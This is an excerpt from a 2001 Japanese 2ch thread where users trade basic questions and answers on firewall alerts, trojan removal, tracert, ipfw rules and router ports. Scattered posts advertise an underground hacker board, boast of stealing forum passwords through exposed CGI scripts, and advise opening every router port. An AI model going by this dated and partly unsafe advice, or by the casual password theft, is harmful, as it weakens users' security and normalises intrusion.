ちなみにOUTLOOKを起動すると100%感知するようです。

343 :名無しさん@お腹いっぱい。:01/12/14 18:32
>>342
防火壁はあんたのパソからのインターネットアクセスをブロックした
そいつは 172.17.1.2 のポート 61844へアクセスしようとした。

ってローカルIPじゃん? 342さん会社で使用してるとか?
けど 61844ポート って 何よ

344 :名無しさん@お腹いっぱい。:01/12/14 18:34
>>343
会社では使用してないけど専用線ではあります。
現在も5分おきくらいに似たような警告が・・・

345 :343:01/12/14 18:36
すまん 逆だ
貴方のPCへインターネット172.17.1.2からのアクセスを
の間違いで鬱だ詩嚢

346 :343:01/12/14 18:38
>>344
まず自分のPCのIPしらべれ
次に
tracert 172.17.1.2
貴様の専用線って どんな専用線ですか?

347 :名無しさん@お腹いっぱい。:01/12/14 18:39
>>343
英語の勉強し直し!
to your computer (IDENT)
あなたのコンピューターへ (IDENT←こっちが本題だ!)
from 172.17.1.2 (TCP Port 61844)
172.17.1.2 (TCP ポート 61844←関係ない!)から

>>342
WinでIDENT鯖動いてないだろうから問題はないはず

348 :347:01/12/14 18:41
>>345
すまねえ。訂正してた。

漏れも共倒れ宇津だ詩嚢

349 :342:01/12/14 18:43
>>343
自分のIPは
61.114.XXX.XXX
あと、専用線じゃなくってローカルCATVの常時接続サービスの間違いです。

350 :343:01/12/14 18:45
>>349
大方CATVだろうとおもたよ。
traceroute の 結果は?
172.17.1.2はたぶんそのCATVの網の中にあるルーターとかじゃないかな

351 :342:01/12/14 18:49
グーグルでtracerouteを検索かけて
172.17.1.2でやってるんですが、なかなか結果が出ません・・・

352 :342:01/12/14 18:52
ちなみにuwhoisで上記ipの検索かけたら
IANA-BBLK-RESERVED
ってトコに引っかかりました。
英語駄目駄目なんで意味がわかりませんが・・・

353 :343:01/12/14 18:53
>>351
それ、どっかのWEBからで永遠と出ない

スタートボタン>>ファイル名を指定して実行>>command.comと入力
プロンプト出たら
tracert 172.17.1.2

354 :343:01/12/14 18:55
>>352
RFC1998 CLASS-B PRIVATE 172.16.0.0 -172.31.255.255
いあんな。

355 :名無しさん@お腹いっぱい。:01/12/14 18:56
>>352
10.0.0.0/8、172.16.0.0/12、192.168.0.0/16はプライベートIPだってば。
だからグローバルでいくら探しても出てこない

356 :342:01/12/14 18:58
一応トレース(4まで)終了したけど何が何やら・・・
とにかくゾーンアラームの警告が100回も200回も出て、正直ウザイです。
ほっといても問題ないのかな?

357 :343:01/12/14 19:00
>>356
自分のPCでやったTRACERT の結果をUPするとエエ。
貴様のIPと2hop目ぐらいまではかくしていいよー。

358 :342:01/12/14 19:03
自分のIPは出てないんですよね・・・

3 10ms 24ms 15ms 172.17.0.253
4 13ms 13ms 13ms 172.17.1.2

trace complete.

359 :343:01/12/14 19:08
>>358
終了終了
気にすんな。
そのプロバイダのsendmailがident返ししてると思われる。
ためしにnslookup 172.17.1.2 してみれば
貴様が使用しているsmtpの見たような名前が出るだろう。



360 :342:01/12/14 19:12
>>343
こんな厨房の質問に長々と答えてもらってありがとです。
2chではじめて人のやさしさに触れた気がします。
それでは・・・

361 :342:01/12/14 19:15
nslookup 172.17.1.2:unkown
自分のsmtp 211.9.xx.x

なんですけど気にしなくていいですよね。

362 :343:01/12/14 19:16
>>361
きにしなくてもいい
211.9 が内部用として 172.17.1.2を使用していると見るべき。

363 :通りすがりさん:01/12/14 19:48
zone はIDENT応答は自動で処理するって聞いてるけど、
>>342 の場合は、なんで反応したんだろうねぇ〜。
そっちのが不思議なんだが…

364 :名無しさん@お腹いっぱい。:01/12/14 21:14
>>51
Outpostって何?

365 :名無しさん@お腹いっぱい。:01/12/14 21:16
BLACKICEはトロイが動き出した時警告してくれます?
zonealarmみたいに許可がないと接続が出来ないみたいな。

366 :名無しさん@お腹いっぱい。:01/12/14 21:22
>>365
アウトバウンドは監視しません。
一般家庭なら、普通のFWで十分です。

367 :名無しさん@お腹いっぱい。:01/12/14 21:32
黒氷はIDSだってさんざん言ってんだろが

368 :365:01/12/14 21:33
そうなんですか〜ありがとうゴザイマス!

369 :名無しさん@お腹いっぱい。:01/12/15 00:46
zoneAlaram とかって便利だけど遅くならない?
TeraTerm とかで一文字打つたびにメーターがピコピコしてくれるんだけど。。。

370 :名無しさん@お腹いっぱい。:01/12/15 01:18
>>369
遅くなるというか、動作が重たいのはあります。
後は、OSとPCのスペックしだいです。私の環境では重いです(笑

371 :名無しさん@お腹いっぱい。:01/12/15 01:31
MS01-058により5.01は完全に撃沈

372 :名無しさん@お腹いっぱい。:01/12/15 05:46
つか、NT系にしろWIN98にしろ
まともなHOTFIXした状態で
personal FWの類入れてなくて困ることってなんだろう
入れてて困った事はカナーリあるけど。

373 :369:01/12/15 09:41
>>370
別スレ見て Sygate にしましたです。まぁこれでも遅くはなるんでしょうけど
zoneAlarm ほどピコピコが派手じゃないのでまだマシかと。

374 :名無しさん@お腹いっぱい。:01/12/15 14:21
今このスレみてトレンドマイクロのオンラインスキャン実行したら、

Trojan System Cleanerが検出され、駆除されました。
TROJ_SUB7.12 TROJ_SUB7.13

ってでて再起動すれって言われてまたスキャンして同じ事言われて・・を
10回位繰り返してるんですが、どうしたらいいでしょうか?
厨房で申し訳ないんですが、助けて下さい・・。

375 :名無しさん@お腹いっぱい。:01/12/15 14:54
>>374
全ドライブ検索の結果は?

376 :374:01/12/15 15:37
>>375
レス有難う御座います!
いまやってる所なんですが、とりあえず

TROJ_SUB7.MUIE.E

とういのに感染してしまっている様です・・。
ちなみに

C\Windows\nhbmlyt.exe

にあります。
宜しくお願いします!

377 :名無しさん@お腹いっぱい。:01/12/15 15:56
>>376
検出されたウイルスの特徴・駆除方法を
トレンドマイクロのウイルスデータデースのページで調べる。

378 :名無しさん@お腹いっぱい。:01/12/15 16:12
無ければ、駆除ソフトを買いにいれ

379 :374:01/12/15 16:26
>>377 >>378
駆除できました!本当に有難う御座いました!
人にPC弄られていたと思うと怖いですね・・。

380 :名無しさん@お腹いっぱい。:01/12/15 16:29
>>379
良き良き。解決できて何より。確かに人にPCを触られていると思うと、安心して使えませんからね。

381 :名無しさん@お腹いっぱい。:01/12/15 18:35
アングラ系のページを見ていたら、インターネットオプションが
開けなくなっていました。なんか”制限されています”とでて、
見れませんでした。
これがクラックツール言うのでしょうか?
どのように対処すればいいのかどなたか教えてもらえないでしょうか?
お願いします。

382 :  :01/12/15 19:00
http://usagi.tadaima.com/2chbbs/subback.html
これ踏んじゃったけど大丈夫ですかね?

383 :親切な人:01/12/15 19:06

ヤフーオークションで、凄い人気商品、発見!!!

「高性能電子辞書」が、たったの 3900 円↓
http://page2.auctions.yahoo.co.jp/jp/auction/b18711631

なかなか手に入らない「一括メール 2001」↓
http://page2.auctions.yahoo.co.jp/jp/auction/b18890297

今は無き「コピーガードキャンセラー」↓
http://page2.auctions.yahoo.co.jp/jp/auction/b18880293

ヤフーオークション内では、現在、このオークション
の話題で、持ちきりです。

384 :名無しさん@お腹いっぱい。:01/12/15 20:57
>>383
どこが親切やねん。

>>372
やっぱり、スパイウェアとトロイの活動封じじゃないかな?
外部からのフィルタリングはオマケみたいなもんだし…。

385 :名無しさん@お腹いっぱい。:01/12/15 22:05
>>384
FW入れとかないと
IEが妙なところへ繋ぎに逝ったときわからんよ

386 :名無しさん@お腹いっぱい。:01/12/16 07:01
ウェブ上をさまよっていたら突然ウィンドウズの警告音やその他コンピュータから
の全ての音声が変になってギャリギャリいう音になってしまいました!どうすれ
ばいいのでしょうか!

387 : :01/12/16 07:16
スピーカーの故障? >386

388 :名無しさん@お腹いっぱい。:01/12/16 09:00
何処で聞いたらいいのかよく分からないんですが、まずここで質問させてください。

昨日の夜、何にもしてないPCの電源が突然入ったんです。
CATVでネットにつないでます。
なので、LANケーブルはつないだままでしたが、電源は完全に切ってありました。
なんだかよく分からず不気味だったので、とりあえずケーブル引き抜いて慌てて電源切りました。

電源を切ってあるPCを外部から操作するなんて事が可能なんでしょうか?
不可能だとすると電源が入った原因としては何が考えられるんでしょう?

ファイヤーウォールは入れてません。
ウイルスソフトはノートンがはいってます。
(ちなみにウイルスはチェック済みです。)
w98seです。

389 :名無しさん@お腹いっぱい。:01/12/16 09:28
>>388
・LANがウェイクアップに対応しているので、信号を送られ起動した。

・電圧低下やノイズなどにより、PCが電源を入れたと勘違いして誤作動。

・ウイルスなどによりそういう仕組みが組み込まれた。

上の2つが可能性高いかと。
CATVならファイアーウォールを入れることをお薦めします。

390 :名無しさん@お腹いっぱい。:01/12/16 10:13
>>389
PCの勘違い誤作動ということがあるんですか・・・
外部操作の可能性はないということでいいんでしょうか?
とりあえずファイアーウォールいれます(^^;。
レスありがとうございました。

391 :名無しさん@お腹いっぱい。:01/12/16 12:12
ログ見てたら、今日 6112/tcp に外から接続してきた奴がいた。
これって CDE の脆弱性を衝こうとしてるのかな?

392 :マカダメ住人:01/12/16 14:14
>>388-389
ちょいとお邪魔致します。388さん+便乗質問なんですが、
うちもCATV+ファイアーオールですが
もし何らかの外からの侵入らしきものを調べるときは
どうすればいいのでしょうか?
今のところ勘違い電源ONもありませんが、怖いので。
391さんみたいに、ログを見る?という初歩的なことが
イマイチわかりません。
(どこを見たらわかるんでしょう??internet option?)

ウィルスの場合は、マカダメ&シマンテックでオンラインスキャンして
なんとか持ちこたえましたが、この先のいざ!に備えて勉強したいので
どうか教えてくださいませ。m(__)m
OSは98SEです。

393 :名無しさん@お腹いっぱい。:01/12/16 14:20
>>392
ファイアーウォールがログ取ってるんじゃない?
OS標準でそういうログを取るようなことはしないよ。

394 :名無しさん@お腹いっぱい。:01/12/16 14:21
>>392
ファイアーウォール(以下FW)にログが残ると思います。
FWはノートンとか市販されてます。フリーでもZoneAlarmやTinyとかあります。
ここの板にも色々FWなどの情報がありますので、参考にしてみてください。

あと、ノートンなりバスターなりウイルス対策ソフトは入れておいたほうがいいです。
オンラインはちょっとめんどくさいですし。

395 :マカダメ住人:01/12/16 14:50
>>393-394
ありがとうございました。FWがログをとっていました。
ワードパッドで読むこともできました。
マニュアル読んでもピンときていなかったので
非常に助かりました。m(__)m

396 :名無しさん@お腹いっぱい。:01/12/16 15:09
FreeBSDでNICを二枚刺し、PPPoEで接続しています。
FWの設定はこんな感じで良いのでしょうか?
ipfw add deny log ip from any to any frag
ipfw add allow ip from any to any via 内部LANのNIC
ipfw add allow ip from any to any via lo0
ipfw add deny log ip from 192.168.0.0/16 to any in
ipfw add deny log ip from 172.16.0.0/12 to any
ipfw add deny log ip from 10.0.0.0/8 to any
ipfw add allow tcp from any to any established
ipfw add allow tcp from any to any out
ipfw add allow udp from any to DNSのIP 53
ipfw add allow udp from DNSのIP 53 to any
ipfw add allow udp from any to セカンダリDNSのIP 53
ipfw add allow udp from セカンダリDNSのIP 53 to any
ipfw add deny log tcp from any to any
ipfw add allow udp from NTPサーバのIP 123 to any
ipfw add allow udp from any to NTPサーバのIP 123
ipfw add allow log icmp from any to any out icmptype 8
ipfw add allow log icmp from any to any in icmptype 0
ipfw add deny log ip from any to any

397 :名無しさん@お腹いっぱい。:01/12/16 15:49
>>1
>スレッドを立てるまでもない質問などはここに

398 :名無しさん@お腹いっぱい。:01/12/16 16:02
>>396
TCPが甘いね

399 :名無しさん@お腹いっぱい。:01/12/16 17:27
甘いと言うか・・・ノーチェック?

400 :名無しさん@お腹いっぱい。:01/12/17 20:00
おちてたよ

401 :395:01/12/17 20:25
まずここで聞きますが、お願い致します。

実はさきほどまたREメールが1通きてました。
とりあえずアウトルックで全メール削除(DM)
そのあとマカフィーFWのイベントログを読むと

不明のトラフィック(情報)
着信TCPをブロックしています。というのが3つあって
1つめは
src=207,86,3,139
dst=211,133,229,220
sport=1199
dport=53(305)

もう2つは
src=67,104,51,129
sport-2233
dport-25(305)
となっています。

マニュアルを読んでもサッパリわかりません。
どこかのスレでsrc=スクリーンセイバー?(ウィルス?)
を送りつけるとかいうのを読んだ気がします。
自分の何か早合点なのか?本当になにかアタックされているか
実のところよくわかりません(情けない・・・)

もしそうなら送り主を調べたい&こういう場合、何をどう対処するのが
1番いいのでしょうか?再び教えてちゃんですみませんが、
お願い致します。

402 :名無しさん@お腹いっぱい。:01/12/17 20:32
src=ソース(IPアドレス/ポート)
dst=醤油(IPアドレス/ポート)

403 :395:01/12/17 20:37
>>402
どうもありがとう!
やっぱ自分バカです・・・恥ずかしい(////)
早合点でいいのですね・・・回線きって鬱死てきます。

404 :名無しさん@お腹いっぱい。:01/12/17 20:52
IP断片化についての質問です。
Norton Internet Security 2002を導入し、
「断片化したIPパケットを遮断する」設定にすると、
WMP6.4でストリーミング受信ができない場合があります。
NIS2002のHelp説明によれば、
「ひどく断片化したパケットを遮断します。
通常この種類のパケットは正当なネットワーク通信のためでなく、
攻撃の目的で使います。」、と書いてあるので、
断片パケットを許可のまま使用することに不安があります。
ちなみにMTU=1454、RWIN=65535です。

そこで質問。
(1)断片パケットを許可すると、具体的にどういうリスクが
あるのでしょうか?
(2)現在NIS2002のFW設定は最高度で使用していますが、
断片IPパケットを許可したばあい、それでもリスクは
残るのでしょうか?
(3)OSの通信設定をかえることで断片パケットが出なくする、
あるいは出にくくする方法ありますか?

よろしくご教授ください。

405 :知ったか:01/12/18 01:51
添削きぼんぬ

>>404
(1)
へたれなシステムでは断片パケットの受信を想定してないことがある。
このようなパケットを受信することにより、OSが異常終了するなどの
障害が発生する場合がある。
参考:
http://www.microsoft.com/japan/support/kb/articles/JP259/7/28.asp
http://www.google.com/search?hl=ja&q=%92f%95%D0++exploit&lr=

(2)
サポートに聞け

(3)
断片パケットはよそからやってくるものなので
そーいう方法は無い

406 :名無しさん@お腹いっぱい。:01/12/18 03:22
>>405
情報ありがとうございます。参考になりました。
それにしてもシステムダウンとは怖いですね。

407 : ◆KwOOGUp. :01/12/18 16:20
エロサイトその他不正のサイトをプロキシのアクセスコントロールで接続不可にしたいのですが、
定期的に更新される無料サイトリストってどっかにころがってないっすかねぇ…。

…って板違い?

408 :名無しさん@お腹いっぱい。:01/12/18 17:15
識者の方々に相談したいことがあります。
トンチンカンな相談かもしれませんが…

修行がてら、Linux+ApacheでHTTPサーバを設置してみたのですが、
未だに、CodeRedだかNimdaだかに侵されたNTサーバから、
結構な数のアクセスがあります。
流行してたのいつの話だよ、今までコイツラ何やってんだよヲイ。

一応、それらのアクセスは、別のlogに切り分けるよう
設定はしているものの…正直ウザイ。ウザすぎる。
特に、HDD容量は雀の涙、回線は爺ちゃんのションベンのように
チョロチョロしたり途切れたりするような、
それはもう哀しさ溢れ巻くりングのヘタレサーバでありんすので
それらのアクセスだけで、もうかなりうんざり状態なのレス…

故に、できるなら、それらナマケモノ管理者達に、
「あんたのサーバやべえよ…なんとかしろよ…」
と知らせたいのですが…手元に残ってるのはIPアドレスのみ…

この場合どうすれば彼等に、ウイルスに感染してる事実を、
バックドアが仕込まれてる事実を、知らせる事ができるのでしょう。
何か良い手はありませんでしょうか?

なにぶん当方、まだまだ修行中の身であり、
ネットワールドのルール・しきたりを全然知らない上に
英語もサパーリな完全無敵絶対運命厨房なので、
何が最も波風立たない方法なのかがよーわからんのであります。

きっと向こうはこっち以上にバカばかりだから、
下手にバックドア使ってメッセージ送っただけでも、
「すわ! サイバーテロだ!!」
とかアホなことヌカして大騒ぎしそうな感もあり。
(ってテメエがむしろテロになってんの気がつかねーのかこのボケ、
と言いたい。問い詰めたい。小1時間問い詰めたい)

どないしたらええんでしゃっろ…

409 :名無しさん@お腹いっぱい。:01/12/18 17:39
典型的な犬厨だな。とっとと犬小屋に帰れよ。

まあ、お前みたいなやつはローカルでやってろってこった。

410 :名無しさん@お腹いっぱい。:01/12/18 17:55
>>408
良い手があったらあんたがこんな相談することもなかったでしょう。

411 : :01/12/18 17:59
>>407
それって、教育機関などを相手に結構いい商売になっているから、
なかなか無料でってのは難しいと思う。
あったとしたら、機械的に言葉とか分類で切られているんじゃないか。
商売でやっているところは、人手で洗っているからコスト食う。

412 :名無しさん@お腹いっぱい。:01/12/18 18:31
>>408
目には目を。歯には歯を。
ウイルスにはウイルスで対抗するしか(嘘

413 :っy:01/12/18 18:54
///////////////////

■ 全国のハッカー&荒らし集合!! ■




http://kgy999.ath.cx/cgi-bin/1/2.cgi
史上最悪のUG掲示板

/////////////////////


:::
::::

414 :名無しさん@お腹いっぱい。:01/12/18 19:19
>411

うちの掲示板を閲覧する人で
教師らしいのですが、
「職場のPCからは閲覧できない(笑)」
って、そればっかり書き込みする人がいてうんざりしています。

まるでエロ話しかしていないと言わんばかりでかなりムカついている。
本人はこっちがムカついているとは全く気が付いていないで
無邪気なものです。

教師って世間が狭くていやだ!

415 : :01/12/18 19:29
>>414
おぬしは了見がせまいのう

416 : ◆KwOOGUp. :01/12/18 19:51
>>411
やっぱり(笑)。レスありがとう。
諦めて金かけるかぁ…。

417 :414:01/12/18 19:55
>>415
そうかもね(^^;

いつもいつもそのことばっかり書き込みするのはその先生だけなので、
教師って他に話題がないのかと思って(^^;

418 :411:01/12/18 22:47
>>414,>>415,>>417
まあ、なんちゅうか、掲示板とかチャットは全部ダメってつもりで、
cgi-binなんちゅうパス名で制限していたりするケースもあるから、
こういうのやられると、どんな無害な掲示板でも制限され、
反面2チャンだとピンクチャンネルですら見られたりする(藁
個人のサイトとかは、プロバイダの掲示板使っていたりするから、
cgi-binでひっかかったりするのよね。
多分そゆことグチりたいのではないかな、そのセンセ。

419 :名無しさん@お腹いっぱい。:01/12/19 00:03
TCP Port 1214へのアクセスがzoneAlarmの今日のログに結構記録されてるんですが、
このポートはどういうサービスが利用しているんですか?

420 :tri:01/12/19 00:33
米鳥でcgiスクリプト見放題!
今、掲示板のパス抜きまくってるぞー

421 :名無しさん@お腹いっぱい。:01/12/19 00:37
>>420
本当だ。
やばいね★彡

422 :名無しさん@お腹いっぱい。:01/12/19 01:39
>>419
http://www.kazaa.com/
↑たぶんこれじゃないですか?

423 :名無しさん@お腹いっぱい。:01/12/20 01:27
新たに新スレを立てるまでもないので
ここに書き込ませてもらいます。
いったい何時になったら、ハッキングが
無くなるのでしょうか?

それを楽しんでいる人にとっては笑い事でしょうが
正直怖いし、気持ち悪いです。
何年もメールアカウントを変えない、パスワードを変えない
のは論外として、ハッカーにしてみれば他人のパソコンに進入するのは
朝飯前でしょ。
ネットワークである以上、ユーザー名、パスワードなど文字で設定している間は
ハッキングという問題は永遠に無くならないと思います。

パソコンを起動させる際、身体的特徴、例えば個人特有の指紋とかで
認識させるというは技術上可能なはず。
メーカーはそういったパソコンを開発しているのでしょうか?

424 :七資産に接続しる:01/12/20 01:30
>>423
423さんが考えてるような部分からじゃないんだす。進入
って。

425 :419:01/12/20 02:36
>>422
どうも。
やっぱりファイル共有サービス系だったか…(´へ`)ハァ

426 : ◆SHIN/RBk :01/12/20 03:07
初めてオンラインスキャンをしたらウィルスに感染してた。
絶対大丈夫だと思ってたんだけど・・・。
かなり鬱だ。

427 :名無しさん@お腹いっぱい。:01/12/20 03:07
eazyfoxさんのところ掲示板見れないけど何かあったの?

428 :名無しさん@お腹いっぱい。:01/12/21 05:19
プロバイダ側の自分のサイトのwwwに、見たことの無いファイルが存在していました。
ファイル名が「dead」でLETTERファイルと記載されていました。
気味が悪いので中身を見ないで削除しましたが、これは何者かに進入されているのでしょうか?
試しにウイルスチェッカーを利用したところ、ウイルスは無かったのですが、トロイが1つ見つかりました。
「削除しました」と表示されてはいるんですが、不安で仕方が無いんです。
どなたか詳しくわかる方いらっしゃらないでしょうか?
宜しくお願い致します。

429 :名無しさん@お腹いっぱい。:01/12/21 07:09
>>428
ここの一番下のところ読んで
http://www.cyberoz.net/faq/cgi1.html

430 :428:01/12/21 16:39
>>429
即レスありがとうございました。
私の無知だったのですね・・・・
もう少しちゃんと勉強するようにします(^^;;;

431 :名無しさん@お腹いっぱい。:01/12/21 17:43
Hなサイトなどをまわって動画をおとしたあと、
よくノートン先生が「ブートレコードが変更されています」と
教えてくれます。ログはこんな感じ↓です。

ドライブ C: のブートレコードは予防接種後に変更されています。
ブートレコードは修復されました。

このような症状がおきる原因はなんだとおもわれますか?
キチンとIEのセキュリティ関連の設定はすべてオフに
しているのですが・・・。

432 :431:01/12/21 18:02
>>431
あと、ウィルススキャンも異常なし。ウィンドウズアップデートなども
済ませました。

433 :名無しさん@お腹いっぱい。:01/12/21 18:52
>>431
ブートレコードを変更するプログラムを自分で動かしてるとか…。
(各種マルチブートツールなど)

434 :431:01/12/21 21:12
>>433
いえ。出るのはきまってエロサイトにいった直後に
ウィルスチェックをした時なんです。
マルチブートツール?というのも使用していません。(win98seしか
いれてません。)

435 :名無しさん@お腹いっぱい。:01/12/21 21:19
私もいま先ほど、同じ現象に遭遇しました。
エロサイトに逝った直後ではありませんが。

436 :431:01/12/21 21:39
詳しくいうと、樹璃無形式のファイルを結合したあとに、
一緒にDLしたほかのファイルも合わせてチェックするように
してるんですが、ちょうどそのときにいつも上記のような警告がでます。
JavascriptやJavaなども切ってるんですが、それでもブートレコードを
変更できるんでしょうか?

(修復すればなんともないようなのですが・・・)気になります。

437 :にゃん:ぱら
りん



438 :名無しさん@お腹いっぱい。:01/12/22 02:38
>>436
ん〜。あるとしたら、その樹璃無ってソフトがそーいう行動をしてるってぐらい?
バグかもしれんし、作者に問い合わせてみたら?(無実かもしれんし穏便にね)

439 : :01/12/22 05:00
メルコのBLR-TX4と言うルーターを使っているのですが
MSNメッセンジャーでファイルの転送が出来ません、何のポートを
Openすればいいのでしょうか。

440 :名無しさん@お腹いっぱい。:01/12/22 05:03
>>439
TCP:1024-65535
UDP:1024-65535

441 : :01/12/22 05:06
>>440
本当にありがとうございます
今すぐ設定してきます

442 :439:01/12/22 05:10
数分たつと 使われていないポートは閉じられてしまうのですが、
もしかすると、それが原因なのでしょうか。

今は
TCP:1-65535
UDP:1-65535

にしています。

443 :名無しさん@お腹いっぱい。:01/12/22 06:02
>>442
ルータのファームを最新のものにしないと5分で切れるよ

444 : :01/12/22 06:35
>>443
最新のものにしています。
ただ、ファイルの転送がどうしても出来なくて
困ってます

445 :名無しさん@お腹いっぱい。:01/12/22 06:50
>>444
「音声通話機能/ファイル転送はご利用できません」だと。

446 : :01/12/22 06:52
>>445
やっぱムリなんか、
メルコのルーターなんか買うんじゃなかった。
このスペックで4千って怪しいと思ったんだよ。
梅田ヨドバシの人 こんなんすすめてくるなよぅぅ。。。

447 :名無しさん@お腹いっぱい。:01/12/22 06:54
>>444
あとはDMZを使うしかないか。

448 : :01/12/22 07:03
>>447
DMZにLAN側IPを設定すればいいのですね

449 ::01/12/22 07:05
ファイアウォ−ルについての質問です。セキリィレベルを「高」にするとIEもOEも
使えなくなってしまいます。
接続中なのに「接続してください」みたいなメッセージが出るのですが…。

450 :名無しさん@お腹いっぱい。:01/12/22 08:23
>>449
何を使っているかとか全然情報がないんだけど。。。
Zone Alarmとかなら、ローカル中、インターネット高が
デフォルトで、大体それで問題ないはずだが?
もちろん最初の頃は、設定していなかったソフトごとに
問い合わせをしてくるけど、そのつどOK出してやればすむことで。

451 :名無しさん@お腹いっぱい。:01/12/22 08:24
>>449
ああ、そうそう、代表的はファイアウォールソフトには
大体それ専用のスレがあるし、相互スレもあるんで、
そっちを読むなり質問する方がいいかと思う。

452 :名無しさん@お腹いっぱい。:01/12/22 09:42
XP&ZONEの質問。
Generic host process for Win32 Service
というのが3つアクセスしてるんですけど、なんなのでしょうか?。
そのうち、二つが共有設定(手のマーク)
以下詳細
@TCP5000:UPD1900
AUPD:1026
B共有設定じゃない。

止めるとネットに繋がらないし、
勝手にアクセスしてるのが、ちょっと怖い。
ノートンでウイルスチェックしても問題ありません。
なにか問題あったら教えてほしいです。
よろしくお願いします。

453 :名無しさん@お腹いっぱい。:01/12/22 09:46
>>452
UPDじゃないUDPだ!
http://homepage2.nifty.com/winfaq/wxp/network.html#754

454 :名無しさん@お腹いっぱい。:01/12/22 10:24
>>453
どうもありがとう。
UPD・・・・・は・・・UDP・・・・
恥かしい・・・・・・
勉強します。
にしてもホントにありがとう。

455 :名無しさん@お腹いっぱい。:01/12/22 10:34
Yahoo!BBにしたら、他人から勝手にファイルを共有されることがあるんです。
zonealarmインストールしてみた。
これはブロックしてくれた、ってことなのでしょうか?
日本語化しとけば良かった。

http://www7.big.or.jp/~mb2/bbs/up/img-box/img20011222103041.gif

456 :名無しさん@お腹いっぱい。:01/12/22 10:40
>>455 辞書引いて調べましょう。

↓ここの>>1をよく読みましょう。
ZoneAlarm Part3
http://pc.2ch.net/test/read.cgi/sec/1006399748/

457 :名無しさん@お腹いっぱい。:01/12/22 10:56
初心者ですよろしくお願いします。
X97M LAROUXZNというウイルス
に感染しているようですがウリルスバスター
2001で駆除できず隔離も失敗します。
よい駆除方法はないでしょうか?

458 : :01/12/22 11:14
ウリルスバスター!!!

459 :名無しさん@お腹いっぱい。:01/12/22 11:55
>>457
ラルーならそのトレンドマイクロのページに特別に駆除方法が
書いてあるからまずそっち読んでから質問すべきだろ。

460 :431:01/12/22 12:16
>>438
いえ、樹璃無を結合してる詩子は関係ありませんでした。
というのも、毎回毎回余計なことしやがってこの野郎と
思って削除したんですが、他の結合ソフトでもなりました。
あと、結合する前に(サイト閲覧直後)もなりました。

461 :名無しさん@お腹いっぱい。:01/12/22 14:19
>>460
もう少し状況を整理してからカキコしてくれい。
結合ソフトはシロなんだね?
特定のサイトのみの閲覧で100%再現するのだね?

462 :431:01/12/22 14:58
>461
すいませんでした。
そうです。どのサイトか特定はむずかしいのですが(数が多くて)
2週間に一度ぐらいのペースでお気に入り全部チェックしたときにおこります。

win98IE5.5sp2
セキュリティパッチ・設定などはちゃんとしてます。
これでも簡単にブートレコードを書き換えられるような技術が
あるんでしょうか・・・・・。
もしかしたら、分割ファイルに仕掛けがあるんでしょうか・・・。

463 :名無しさん@お腹いっぱい。:01/12/22 19:09
>>449
まさかあんたAOLじゃねーだろうな?

464 :名無しさん@お腹いっぱい。:01/12/23 11:47
>459 ”そっちに書いてあるよ”でいいんだよ。

465 :名無しさん@お腹いっぱい。:01/12/23 13:18
久々にコンパネのアプリケーションの追加と削除みてみたんだが・・・
絶対に自分で入れてないし、使わないlanguage supportがたくさん入ってる。
arabic,chinease,hebrew,thai 等・・・
これってなんだろ?勝手に入るもんじゃないと思うんだが・・・
踏み台とかじゃないよね・・・

あとC:\WINDOWS\TEMPに変なのがあったYO
KillMe
MS-DOS アプリケーションへのショートカット
967バイト  拡張子 PIF
コマンドライン C:\windows\TEMP\KillMe.bat

オンラインウィスルスキャンにひっかからず、
環境 ADSL ルーターなし ゾヌ入ってます。
なんかヤバイかな?

466 :名無しさん@お腹いっぱい。:01/12/23 13:30
>>465 そのバッチファイルの中身をアップしてみれ。

467 :465:01/12/23 13:47
>>466
CドライブをKillMe で検索したけど、そのショートカットしかないみたいなんですが・・・

468 :名無しさん@お腹いっぱい。:01/12/23 13:54
>>467 それじゃあ起動できないんだから関係ないと思われ。

もちろん隠しフォルダ内も検索したんですよね?

469 :名無しさん@お腹いっぱい。:01/12/23 14:17
>>468
WIN98です
サブフォルダも探すにチェックが入っています。
検索で名前と含まれる文字列 KillMeでやっていました。
いいのかな?

今一応、検索やり直してます。
含まれる文字列 KillMe のみで検索するといろいろひっかかってます。
意味ないかな・・・

470 :名無しさん@お腹いっぱい。:01/12/23 19:33
>>465
そもそも、language supportは Ieのセキュリティ設定によっては
自動でダウンロード&インストールされるんだけど、そのへんはどうなの?

471 :465:01/12/23 19:49
>>470
ありがとう 思い当たるのはIE6にした事かな。
IE5.5の時は確認の画面が出ていました。
IE6にして、まだそんなに使い込んでいないけど、そういった画面見てないですね。
自動でダウンロードされてるのかな?設定は5.5とほぼ同じだと思います。
ちなみにフォントのダウンロードはダイヤログ出す設定です。(フォント関係なかったらすいません)

アラビア、タイ、ベトナム語のサイトに行った記憶もないですし・・・
けど、どっかでたまたま見たとしか思えないですよね・・・そう思いたいです。

472 :名無しさん@お腹いっぱい。:01/12/23 20:23
わけがわかりません。
新しいマシンがXPproでとりあえずマカを入れた。
ついでゾヌの2.6.362を入れた。
で、マカフィーが嫌いだから、ノートンシステームワークス2002の
アンチウィルスを入れたら、ゾヌのプログラムの接続許可に全て×がついているんです。
マカのときはそんなことなかったのです。
98でゾヌとアンチウィルス2001を併用しているときも問題なかったです。
ネットなんかはできています。
XPのFWは切っています。
インストール手順はマカをアンイントールしてからノートンを入れました。

過去レスで見つからなくて(見つけられなくて)。
教えてくんですみません。

473 : ◆FpDAQIe2 :01/12/23 21:00
ttp://www.vwalker.com/news/0112/21_microsoft_b/21_microsoft_b.html
もう IE6SP1ベータ配布してたんだ。。ガイシュツ?

474 : :01/12/24 01:06
プロバイダ側は僕が何処のサイトに繋いだかは分かると思うのですが
僕のパケットを盗んでどんなファイルをDLしてるか、
どんな文章を投稿したか、などは分かるのでしょうか?
お願いします。教えて下さい。

475 :名無しさん@お腹いっぱい。:01/12/24 01:19
ところで、知るわけない他人のパスワード適当に入力して、
拒否されて、「そりゃ無理だわな」っていうのは、
不正アクセスになるんですか?

476 :名無しさん@お腹いっぱい。:01/12/24 01:31
>>475
万が一繋がると不味いかも。
繋がらなくても繰り返せば、、、、警告来そうだな。

477 :475:01/12/24 01:55
一回きりなら大丈夫ですよね。
一度やってビビッたので。
ログはとられたけど。

478 :名無しさん@お腹いっぱい。:01/12/24 02:06
>>477
ところで、って軽く話題に入ってたけど、内心ビビッてたんだね。(w
心配しなくても大丈夫だと思うよ。政府機関とか怪しいサイトでなければ。

479 :名無しさん@お腹いっぱい。:01/12/24 02:42
>>471
ランゲージサポートは、
詳細設定の「インデマンドインストール」のほうだと思うよ。

480 :名無しさん@お腹いっぱい。:01/12/24 07:38
www.top.or.jp/~godhand/a2.html

↑これ、どなたか調べていただけませんでしょうか?

481 :471:01/12/24 08:28
>>479
ありがとう!
